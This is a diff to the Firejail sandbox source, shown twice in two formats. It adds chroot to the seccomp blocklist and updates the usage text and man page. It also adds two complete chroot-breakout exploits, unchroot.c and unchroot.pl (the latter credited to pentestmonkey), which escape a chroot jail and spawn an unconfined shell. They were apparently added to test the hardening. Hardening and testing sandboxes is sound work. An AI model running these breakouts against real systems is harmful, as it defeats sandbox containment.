8 files changed, 168 insertions, 4 deletions
diff --git a/src/firejail/main.c b/src/firejail/main.c
index e39a41502..1c1c3a08f 100644
--- a/src/firejail/main.c
+++ b/src/firejail/main.c
@@ -1226,8 +1226,8 @@ int main(int argc, char **argv) {
                        fprintf(stderr, "Warning: default profile disabled by --chroot option\n");
                else if (arg_overlay)
                        fprintf(stderr, "Warning: default profile disabled by --overlay option\n");
-                else if (cfg.home_private_keep)
+//              else if (cfg.home_private_keep)
-                        fprintf(stderr, "Warning: default profile disabled by --private-home option\n");
+//                      fprintf(stderr, "Warning: default profile disabled by --private-home option\n");
                else {
                        // try to load a default profile
                        char *profile_name = DEFAULT_USER_PROFILE;
diff --git a/src/firejail/sandbox.c b/src/firejail/sandbox.c
index 427b3fc09..b23c5d742 100644
--- a/src/firejail/sandbox.c
+++ b/src/firejail/sandbox.c
@@ -210,6 +210,8 @@ int sandbox(void* sandbox_arg) {
                        if (!arg_quiet)
                                printf("Dropping all Linux capabilities and enforcing default seccomp filter\n");
                }
+                else
+                        arg_seccomp = 1;
                                                
                //****************************
                // trace pre-install, this time inside chroot
diff --git a/src/firejail/seccomp.c b/src/firejail/seccomp.c
index 6ab3ae56e..353b212f6 100644
--- a/src/firejail/seccomp.c
+++ b/src/firejail/seccomp.c
@@ -385,6 +385,7 @@ void seccomp_filter_32(void) {
                BLACKLIST(294), // migrate_pages
                BLACKLIST(317), // move_pages
                BLACKLIST(316), // vmsplice
+                BLACKLIST(61),  // chroot
                RETURN_ALLOW
        };
@@ -558,6 +559,9 @@ int seccomp_filter_drop(void) {
 #ifdef SYS_vmsplice
                filter_add_blacklist(SYS_vmsplice, 0);
 #endif
+#ifdef SYS_chroot
+                filter_add_blacklist(SYS_chroot, 0);
+#endif
        //#ifdef SYS_set_robust_list
        //              filter_add_blacklist(SYS_set_robust_list, 0);
        //#endif
diff --git a/src/firejail/usage.c b/src/firejail/usage.c
index c829b94f2..76c12ecc1 100644
--- a/src/firejail/usage.c
+++ b/src/firejail/usage.c
@@ -225,7 +225,7 @@ void usage(void) {
        printf("\t\tio_destroy, io_getevents, io_submit, io_cancel,\n");
        printf("\t\tremap_file_pages, mbind, get_mempolicy, set_mempolicy,\n");
        printf("\t\tmigrate_pages, move_pages, vmsplice, perf_event_open and\n");
-        printf("\t\tkexec_file_load.\n\n");
+        printf("\t\tkexec_file_load, chroot.\n\n");
        
        printf("\t--seccomp=syscall,syscall,syscall - enable seccomp filter, blacklist the\n");
        printf("\t\tdefault syscall list and the syscalls specified by the command.\n\n");
diff --git a/src/man/firejail.txt b/src/man/firejail.txt
index 52b75afaa..912a08580 100644
--- a/src/man/firejail.txt
+++ b/src/man/firejail.txt
@@ -905,7 +905,7 @@ sysfs,_sysctl, adjtimex, clock_adjtime, lookup_dcookie, perf_event_open, fanotif
 add_key, request_key, keyctl, uselib, acct, modify_ldt, pivot_root, io_setup,
 io_destroy, io_getevents, io_submit, io_cancel,
 remap_file_pages, mbind, get_mempolicy, set_mempolicy,
-migrate_pages, move_pages, vmsplice, and perf_event_open.
+migrate_pages, move_pages, vmsplice, perf_event_open and chroot.
 .br
 .br
diff --git a/src/tools/unchroot b/src/tools/unchroot
new file mode 100755
index 000000000..d32ce2682
--- /dev/null
+++ b/src/tools/unchroot
Binary files differ
diff --git a/src/tools/unchroot.c b/src/tools/unchroot.c
new file mode 100644
index 000000000..21731296e
--- /dev/null
+++ b/src/tools/unchroot.c
@@ -0,0 +1,125 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <errno.h>
+#include <fcntl.h>
+#include <string.h>
+#include <unistd.h>
+#include <sys/stat.h>
+#include <sys/types.h>
+/* 
+ ** You should set NEED_FCHDIR to 1 if the chroot() on your
+ ** system changes the working directory of the calling
+ ** process to the same directory as the process was chroot()ed
+ ** to.
+ **
+ ** It is known that you do not need to set this value if you
+ ** running on Solaris 2.7 and below.
+ **
+ */
+#define NEED_FCHDIR 0
+#define TEMP_DIR "waterbuffalo"
+/* Break out of a chroot() environment in C */
+int main() {
+        int x;                                    /* Used to move up a directory tree */
+        int done=0;                               /* Are we done yet ? */
+#ifdef NEED_FCHDIR
+        int dir_fd;                               /* File descriptor to directory */
+#endif
+        struct stat sbuf;                         /* The stat() buffer */
+        /* 
+         ** First we create the temporary directory if it doesn't exist
+         */
+        if (stat(TEMP_DIR,&sbuf)<0) {
+                if (errno==ENOENT) {
+                        if (mkdir(TEMP_DIR,0755)<0) {
+                                fprintf(stderr,"Failed to create %s - %s\n", TEMP_DIR,
+                                        strerror(errno));
+                                exit(1);
+                        }
+                }
+                else {
+                        fprintf(stderr,"Failed to stat %s - %s\n", TEMP_DIR,
+                                strerror(errno));
+                        exit(1);
+                }
+        }
+        else if (!S_ISDIR(sbuf.st_mode)) {
+                fprintf(stderr,"Error - %s is not a directory!\n",TEMP_DIR);
+                exit(1);
+        }
+#ifdef NEED_FCHDIR
+        /* 
+         ** Now we open the current working directory
+         **
+         ** Note: Only required if chroot() changes the calling program's
+         **       working directory to the directory given to chroot().
+         **
+         */
+        if ((dir_fd=open(".",O_RDONLY))<0) {
+                fprintf(stderr,"Failed to open \".\" for reading - %s\n",
+                        strerror(errno));
+                exit(1);
+        }
+#endif
+        /* 
+         ** Next we chroot() to the temporary directory
+         */
+        if (chroot(TEMP_DIR)<0) {
+                fprintf(stderr,"Failed to chroot to %s - %s\n",TEMP_DIR,
+                        strerror(errno));
+                exit(1);
+        }
+#ifdef NEED_FCHDIR
+        /* 
+         ** Partially break out of the chroot by doing an fchdir()
+         **
+         ** This only partially breaks out of the chroot() since whilst
+         ** our current working directory is outside of the chroot() jail,
+         ** our root directory is still within it. Thus anything which refers
+         ** to "/" will refer to files under the chroot() point.
+         **
+         ** Note: Only required if chroot() changes the calling program's
+         **       working directory to the directory given to chroot().
+         **
+         */
+        if (fchdir(dir_fd)<0) {
+                fprintf(stderr,"Failed to fchdir - %s\n",
+                        strerror(errno));
+                exit(1);
+        }
+        close(dir_fd);
+#endif
+        /* 
+         ** Completely break out of the chroot by recursing up the directory
+         ** tree and doing a chroot to the current working directory (which will
+         ** be the real "/" at that point). We just do a chdir("..") lots of
+         ** times (1024 times for luck :). If we hit the real root directory before
+         ** we have finished the loop below it doesn't matter as .. in the root
+         ** directory is the same as . in the root.
+         **
+         ** We do the final break out by doing a chroot(".") which sets the root
+         ** directory to the current working directory - at this point the real
+         ** root directory.
+         */
+        for(x=0;x<1024;x++) {
+                chdir("..");
+        }
+        chroot(".");
+        /* 
+         ** We're finally out - so exec a shell in interactive mode
+         */
+        if (execl("/bin/sh","-i",NULL)<0) {
+                fprintf(stderr,"Failed to exec - %s\n",strerror(errno));
+                exit(1);
+        }
+}
diff --git a/src/tools/unchroot.pl b/src/tools/unchroot.pl
new file mode 100755
index 000000000..bd30ffe76
--- /dev/null
+++ b/src/tools/unchroot.pl
@@ -0,0 +1,33 @@
+#!/usr/bin/perl -w
+use strict;
+# unchroot.pl Dec 2007
+# http://pentestmonkey.net/blog/chroot-breakout-perl
+# This script may be used for legal purposes only.
+# Go to the root of the jail
+chdir "/";
+# Open filehandle to root of jail
+opendir JAILROOT, "." or die "ERROR: Couldn't get file handle to root of jailn";
+# Create a subdir, move into it
+mkdir "mysubdir";
+chdir "mysubdir";
+# Lock ourselves in a new jail
+chroot ".";
+# Use our filehandle to get back to the root of the old jail
+chdir(*JAILROOT);
+# Get to the real root
+while ((stat("."))[0] != (stat(".."))[0] or (stat("."))[1] != (stat(".."))[1]) {
+        chdir "..";
+}
+# Lock ourselves in real root - so we're not really in a jail at all now
+chroot ".";
+# Start an un-jailed shell
+system("/bin/sh");

diff --git a/src/firejail/main.c b/src/firejail/main.c index e39a41502..1c1c3a08f 100644 --- a/src/firejail/main.c +++ b/src/firejail/main.c
@@ -1226,8 +1226,8 @@ int main(int argc, char **argv) {
1226	fprintf(stderr, "Warning: default profile disabled by --chroot option\n");	1226	fprintf(stderr, "Warning: default profile disabled by --chroot option\n");
1227	else if (arg_overlay)	1227	else if (arg_overlay)
1228	fprintf(stderr, "Warning: default profile disabled by --overlay option\n");	1228	fprintf(stderr, "Warning: default profile disabled by --overlay option\n");
1229	else if (cfg.home_private_keep)	1229	// else if (cfg.home_private_keep)
1230	fprintf(stderr, "Warning: default profile disabled by --private-home option\n");	1230	// fprintf(stderr, "Warning: default profile disabled by --private-home option\n");
1231	else {	1231	else {
1232	// try to load a default profile	1232	// try to load a default profile
1233	char *profile_name = DEFAULT_USER_PROFILE;	1233	char *profile_name = DEFAULT_USER_PROFILE;


diff --git a/src/firejail/sandbox.c b/src/firejail/sandbox.c index 427b3fc09..b23c5d742 100644 --- a/src/firejail/sandbox.c +++ b/src/firejail/sandbox.c
@@ -210,6 +210,8 @@ int sandbox(void* sandbox_arg) {
210	if (!arg_quiet)	210	if (!arg_quiet)
211	printf("Dropping all Linux capabilities and enforcing default seccomp filter\n");	211	printf("Dropping all Linux capabilities and enforcing default seccomp filter\n");
212	}	212	}
		213	else
		214	arg_seccomp = 1;
213		215
214	//****************************	216	//****************************
215	// trace pre-install, this time inside chroot	217	// trace pre-install, this time inside chroot


diff --git a/src/firejail/seccomp.c b/src/firejail/seccomp.c index 6ab3ae56e..353b212f6 100644 --- a/src/firejail/seccomp.c +++ b/src/firejail/seccomp.c
@@ -385,6 +385,7 @@ void seccomp_filter_32(void) {
385	BLACKLIST(294), // migrate_pages	385	BLACKLIST(294), // migrate_pages
386	BLACKLIST(317), // move_pages	386	BLACKLIST(317), // move_pages
387	BLACKLIST(316), // vmsplice	387	BLACKLIST(316), // vmsplice
		388	BLACKLIST(61), // chroot
388	RETURN_ALLOW	389	RETURN_ALLOW
389	};	390	};
390		391
@@ -558,6 +559,9 @@ int seccomp_filter_drop(void) {
558	#ifdef SYS_vmsplice	559	#ifdef SYS_vmsplice
559	filter_add_blacklist(SYS_vmsplice, 0);	560	filter_add_blacklist(SYS_vmsplice, 0);
560	#endif	561	#endif
		562	#ifdef SYS_chroot
		563	filter_add_blacklist(SYS_chroot, 0);
		564	#endif
561	//#ifdef SYS_set_robust_list	565	//#ifdef SYS_set_robust_list
562	// filter_add_blacklist(SYS_set_robust_list, 0);	566	// filter_add_blacklist(SYS_set_robust_list, 0);
563	//#endif	567	//#endif


diff --git a/src/firejail/usage.c b/src/firejail/usage.c index c829b94f2..76c12ecc1 100644 --- a/src/firejail/usage.c +++ b/src/firejail/usage.c
@@ -225,7 +225,7 @@ void usage(void) {
225	printf("\t\tio_destroy, io_getevents, io_submit, io_cancel,\n");	225	printf("\t\tio_destroy, io_getevents, io_submit, io_cancel,\n");
226	printf("\t\tremap_file_pages, mbind, get_mempolicy, set_mempolicy,\n");	226	printf("\t\tremap_file_pages, mbind, get_mempolicy, set_mempolicy,\n");
227	printf("\t\tmigrate_pages, move_pages, vmsplice, perf_event_open and\n");	227	printf("\t\tmigrate_pages, move_pages, vmsplice, perf_event_open and\n");
228	printf("\t\tkexec_file_load.\n\n");	228	printf("\t\tkexec_file_load, chroot.\n\n");
229		229
230	printf("\t--seccomp=syscall,syscall,syscall - enable seccomp filter, blacklist the\n");	230	printf("\t--seccomp=syscall,syscall,syscall - enable seccomp filter, blacklist the\n");
231	printf("\t\tdefault syscall list and the syscalls specified by the command.\n\n");	231	printf("\t\tdefault syscall list and the syscalls specified by the command.\n\n");


diff --git a/src/man/firejail.txt b/src/man/firejail.txt index 52b75afaa..912a08580 100644 --- a/src/man/firejail.txt +++ b/src/man/firejail.txt
@@ -905,7 +905,7 @@ sysfs,_sysctl, adjtimex, clock_adjtime, lookup_dcookie, perf_event_open, fanotif
905	add_key, request_key, keyctl, uselib, acct, modify_ldt, pivot_root, io_setup,	905	add_key, request_key, keyctl, uselib, acct, modify_ldt, pivot_root, io_setup,
906	io_destroy, io_getevents, io_submit, io_cancel,	906	io_destroy, io_getevents, io_submit, io_cancel,
907	remap_file_pages, mbind, get_mempolicy, set_mempolicy,	907	remap_file_pages, mbind, get_mempolicy, set_mempolicy,
908	migrate_pages, move_pages, vmsplice, and perf_event_open.	908	migrate_pages, move_pages, vmsplice, perf_event_open and chroot.
909	.br	909	.br
910		910
911	.br	911	.br


diff --git a/src/tools/unchroot b/src/tools/unchroot new file mode 100755 index 000000000..d32ce2682 --- /dev/null +++ b/src/tools/unchroot
Binary files differ


diff --git a/src/tools/unchroot.c b/src/tools/unchroot.c new file mode 100644 index 000000000..21731296e --- /dev/null +++ b/src/tools/unchroot.c
@@ -0,0 +1,125 @@
		1	#include <stdio.h>
		2	#include <stdlib.h>
		3	#include <errno.h>
		4	#include <fcntl.h>
		5	#include <string.h>
		6	#include <unistd.h>
		7	#include <sys/stat.h>
		8	#include <sys/types.h>
		9
		10	/*
		11	** You should set NEED_FCHDIR to 1 if the chroot() on your
		12	** system changes the working directory of the calling
		13	** process to the same directory as the process was chroot()ed
		14	** to.
		15	**
		16	** It is known that you do not need to set this value if you
		17	** running on Solaris 2.7 and below.
		18	**
		19	*/
		20	#define NEED_FCHDIR 0
		21
		22	#define TEMP_DIR "waterbuffalo"
		23
		24	/* Break out of a chroot() environment in C */
		25
		26	int main() {
		27	int x; /* Used to move up a directory tree */
		28	int done=0; /* Are we done yet ? */
		29	#ifdef NEED_FCHDIR
		30	int dir_fd; /* File descriptor to directory */
		31	#endif
		32	struct stat sbuf; /* The stat() buffer */
		33
		34	/*
		35	** First we create the temporary directory if it doesn't exist
		36	*/
		37	if (stat(TEMP_DIR,&sbuf)<0) {
		38	if (errno==ENOENT) {
		39	if (mkdir(TEMP_DIR,0755)<0) {
		40	fprintf(stderr,"Failed to create %s - %s\n", TEMP_DIR,
		41	strerror(errno));
		42	exit(1);
		43	}
		44	}
		45	else {
		46	fprintf(stderr,"Failed to stat %s - %s\n", TEMP_DIR,
		47	strerror(errno));
		48	exit(1);
		49	}
		50	}
		51	else if (!S_ISDIR(sbuf.st_mode)) {
		52	fprintf(stderr,"Error - %s is not a directory!\n",TEMP_DIR);
		53	exit(1);
		54	}
		55
		56	#ifdef NEED_FCHDIR
		57	/*
		58	** Now we open the current working directory
		59	**
		60	** Note: Only required if chroot() changes the calling program's
		61	** working directory to the directory given to chroot().
		62	**
		63	*/
		64	if ((dir_fd=open(".",O_RDONLY))<0) {
		65	fprintf(stderr,"Failed to open \".\" for reading - %s\n",
		66	strerror(errno));
		67	exit(1);
		68	}
		69	#endif
		70
		71	/*
		72	** Next we chroot() to the temporary directory
		73	*/
		74	if (chroot(TEMP_DIR)<0) {
		75	fprintf(stderr,"Failed to chroot to %s - %s\n",TEMP_DIR,
		76	strerror(errno));
		77	exit(1);
		78	}
		79
		80	#ifdef NEED_FCHDIR
		81	/*
		82	** Partially break out of the chroot by doing an fchdir()
		83	**
		84	** This only partially breaks out of the chroot() since whilst
		85	** our current working directory is outside of the chroot() jail,
		86	** our root directory is still within it. Thus anything which refers
		87	** to "/" will refer to files under the chroot() point.
		88	**
		89	** Note: Only required if chroot() changes the calling program's
		90	** working directory to the directory given to chroot().
		91	**
		92	*/
		93	if (fchdir(dir_fd)<0) {
		94	fprintf(stderr,"Failed to fchdir - %s\n",
		95	strerror(errno));
		96	exit(1);
		97	}
		98	close(dir_fd);
		99	#endif
		100
		101	/*
		102	** Completely break out of the chroot by recursing up the directory
		103	** tree and doing a chroot to the current working directory (which will
		104	** be the real "/" at that point). We just do a chdir("..") lots of
		105	** times (1024 times for luck :). If we hit the real root directory before
		106	** we have finished the loop below it doesn't matter as .. in the root
		107	** directory is the same as . in the root.
		108	**
		109	** We do the final break out by doing a chroot(".") which sets the root
		110	** directory to the current working directory - at this point the real
		111	** root directory.
		112	*/
		113	for(x=0;x<1024;x++) {
		114	chdir("..");
		115	}
		116	chroot(".");
		117
		118	/*
		119	** We're finally out - so exec a shell in interactive mode
		120	*/
		121	if (execl("/bin/sh","-i",NULL)<0) {
		122	fprintf(stderr,"Failed to exec - %s\n",strerror(errno));
		123	exit(1);
		124	}
		125	}


diff --git a/src/tools/unchroot.pl b/src/tools/unchroot.pl new file mode 100755 index 000000000..bd30ffe76 --- /dev/null +++ b/src/tools/unchroot.pl
@@ -0,0 +1,33 @@
		1	#!/usr/bin/perl -w
		2	use strict;
		3	# unchroot.pl Dec 2007
		4	# http://pentestmonkey.net/blog/chroot-breakout-perl
		5
		6	# This script may be used for legal purposes only.
		7
		8	# Go to the root of the jail
		9	chdir "/";
		10
		11	# Open filehandle to root of jail
		12	opendir JAILROOT, "." or die "ERROR: Couldn't get file handle to root of jailn";
		13
		14	# Create a subdir, move into it
		15	mkdir "mysubdir";
		16	chdir "mysubdir";
		17
		18	# Lock ourselves in a new jail
		19	chroot ".";
		20
		21	# Use our filehandle to get back to the root of the old jail
		22	chdir(*JAILROOT);
		23
		24	# Get to the real root
		25	while ((stat("."))[0] != (stat(".."))[0] or (stat("."))[1] != (stat(".."))[1]) {
		26	chdir "..";
		27	}
		28
		29	# Lock ourselves in real root - so we're not really in a jail at all now
		30	chroot ".";
		31
		32	# Start an un-jailed shell
		33	system("/bin/sh");